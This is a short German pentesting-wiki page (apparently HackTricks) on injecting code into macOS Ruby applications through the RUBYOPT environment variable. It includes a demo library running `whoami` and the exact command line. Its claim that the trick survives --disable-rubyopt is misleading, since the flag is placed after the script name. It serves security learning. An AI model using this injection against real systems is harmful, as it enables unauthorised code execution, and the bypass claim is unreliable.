German - Ht
HackTricks Training Twitter Linkedin Sponsor

macOS Ruby Applications Injection

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

RUBYOPT

Mit dieser Umgebungsvariable ist es möglich, neue Parameter zu Ruby hinzuzufügen, wann immer es ausgeführt wird. Obwohl der Parameter -e nicht verwendet werden kann, um Ruby-Code zum Ausführen anzugeben, ist es möglich, die Parameter -I und -r zu verwenden, um einen neuen Ordner zum Bibliothekenladepfad hinzuzufügen und dann eine Bibliothek zum Laden anzugeben.

Erstellen Sie die Bibliothek inject.rb in /tmp:

inject.rb
puts `whoami`

Erstellen Sie überall ein Ruby-Skript wie:

hello.rb
puts 'Hello, World!'

Dann erstellen Sie ein beliebiges Ruby-Skript und laden Sie es mit folgendem Befehl:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Spaßiger Fakt, es funktioniert sogar mit dem Parameter --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

PreviousmacOS Python Applications InjectionNextmacOS .Net Applications Injection

Last updated